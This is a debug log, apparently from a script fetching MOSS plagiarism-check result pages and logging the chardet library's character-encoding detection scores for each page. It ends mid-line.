http://moss.stanford.edu/results/374137986/match211-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match211-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17069\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17070\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17069\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5289270374829899\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match212-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18750\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16122\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24120\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18737\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16109\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18750\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24107\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16122\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16109\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18737\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24120\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18737\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24107\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16109\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18738\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5667878181900473\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24107\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16110\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18737\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24108\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16109\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24107\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213-0.html\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match213-top.html\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5221403739300993\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214-top.html\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.549982692463897\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match214-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match215-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31478\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31465\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217-top.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31478\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31465\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31465\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31466\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31465\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5440136708076909\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217-0.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match217-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.528035967388954\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match218-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match216-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223-top.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5464387129190916\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match223-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219-0.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19405\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match219-1.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19392\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19405\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19393\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19392\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5297635729864526\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match221-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19405\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23864\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19392\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23851\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19405\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23864\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23851\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19392\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 